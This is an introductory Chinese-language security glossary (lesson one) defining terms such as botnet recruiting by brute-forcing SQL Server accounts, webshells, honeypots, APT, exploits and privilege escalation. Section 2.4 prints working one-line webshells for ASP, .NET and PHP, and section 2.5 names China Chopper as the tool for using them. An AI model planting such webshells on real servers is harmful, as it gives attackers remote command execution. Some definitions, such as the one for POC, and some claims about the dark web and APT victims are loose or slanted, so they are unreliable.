运维安全（第一课）

运维安全术语

1、抓鸡/肉鸡

1.1 什么是抓鸡？
通过扫描弱口令/爆破/漏洞自动化种马达到控制机器。常用的有：1433抓鸡、3389抓鸡、3306抓鸡等

1.2 什么是1433抓鸡？（微软的SQL server的端口号为1433）
用IP扫描工具批量扫描大量开放1433的IP段，使用工具爆破sa账户的弱密码，下载或种植木马。

2、木马的分类

计算机木马、网页木马（大马、小马、一句话木马）

2.1 计算机木马

2.2 网页木马
webshell 就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称作为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的文件混合在一起，然后就可以使用浏览器来访问aps或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

2.3 小马：小马体积小，可以上传大文件或者webshell

2.4 一句话木马
asp： <%execute(request("MH"))%>
.net： <%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php： <?php eval($_POST[a]);?>

2.5 如何使用一句话木马？
工具：中国菜刀（一款专业的网站管理软件）
用途：广泛，体积小巧。只要支持动态脚本的网站，都可以使用中国菜刀进行管理。
大小：214K
语言：在非简体中文环境下，自动切换为英文。
编码：Unicode方式编译，支持多国语言输入显示。

3、蜜罐

蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对他们实施攻击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具和方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实质系统的安全防护能力。

蜜罐好比情报收集系统。蜜罐是故意让人攻击的目标，引诱黑客前来攻击。所以攻击者入侵后，就可以知道其是如何得逞的。随时了解针对服务器发起的最新攻击和漏洞。还可以通过黑客之间的联系，收集黑客所用的种种工具，并且掌握其社交网络。

4、暗网

互联网由3层网络组成：表层网（SurfaceWeb）、深网（DeepWeb）、暗网

4.1 表层网（SurfaceWeb）
指互联网上那些能被标准搜索引擎索引的表面网络内容

4.2 深网
深网（英语：Deep Web，又称、不可见网、隐藏网）是指互联网上那些不能被标准搜索引擎索引的非表面网络内容。（绝大部分这些隐藏的信息是须通过动态请求产生的网页信息，而标准的搜索引擎却无法对其进行查找。）

4.3 暗网（美国发明）
暗网是深网的子集。需要特定的浏览器进行访问。暗网的域名一般是 .onion。

5、免杀（躲避杀毒软件的查杀）

6、APT攻击（中国是APT攻击的主要受害者）

APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击。 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。

6.1 APT攻击的原理：
更为高级和先进，其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。在此收集的过程中，此攻击会主动挖掘被攻击对象受信系统和应用程序的漏洞，利用这些漏洞组建攻击者所需的网络，并利用0day漏洞进行攻击。

7、Exploit（简写为EXP）

Exploit的翻译是：利用。在黑客眼中就是漏洞利用。有漏洞不一定就有Exploit，有Exploit就肯定有漏洞。

8、POC（验证性测试）

POC测试，即Proof of Concept，是业界流行的针对客户具体应用的验证性测试，根据用户对采用系统提出的性能要求和扩展需求的指标，在选用服务器上进行真实数据的运行，对承载用户数据量和运行时间进行实际测算，并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。

9、内网渗透

参考推荐：https://www.secpulse.com/archives/51092.html

10、社会工程学

在计算机科学中，社会工程学指的是通过与他人的合法的交流，来使其心理受到影响，做出某些动作或者是透露一些机密信息的方式。这通常被认为是一种欺诈他人手机信息、行骗和入侵计算机系统的行为。在英美普通法系中，这一行为一般是被认作侵犯隐私权的。

11、社工库

通过各种各种手段得到的数据库汇聚而成的一种大数据。可以通过某些信息精准搜索和锁定个人行为。

12、谷歌黑客（谷歌黑客语法）：主要用于信息搜集

使用搜索引擎，比如谷歌来定位因特网上的安全隐患和易攻击点。web上一般有两种容易发现的易受攻击类型：软件漏洞和错误配置。

虽然一些有经验的入侵者目标是瞄准来一些特殊系统，同时尝试发现会让他们进入的漏洞，但是大部分的入侵者是从具体的软件漏洞开始或者是从那些普通用户错误配置开始，在这些配置中，他们已经知道怎样入侵，并且初步的尝试发现或扫描有该种漏洞的系统。谷歌对于软件漏洞攻击来说，用处很少，但是对于错误配置攻击则发挥了重要作用。

推荐搜索语法： site: 关键字 精准查找域名

13、脱裤

通过非法手段获取网站的数据库，包括但不限于会员的信息或者需要的信息。简单讲就是把数据库下载下来。

14、提权

拿到webshell之后从普通用户提升为管理员权限。

15、0day攻击（一种对计算机软件的攻击方式，俗称未公开漏洞）

15.1 在计算机领域，零日漏洞或者是零时差漏洞（0-day，zero-day）通常是指还没有补丁的安全漏洞。
15.2 零日攻击或零时差攻击则是利用零日漏洞进行攻击。
15.3 提供零日漏洞细节或者是程序的人通常是漏洞的发现者。
15.4 零日漏洞的利用程序对网络具有巨大的安全威胁；因此零日漏洞是黑客的最爱。
15.5 掌握多少零日漏洞成为评价黑客水平的一个重要参数。

16、旁站、c段

旁站：目标站点所在服务器上其他网站，然后在想办法跨到真正目标站点目录中。
C段：网段中的任意一台机器，只要子网相同就有可能嗅探到账号密码。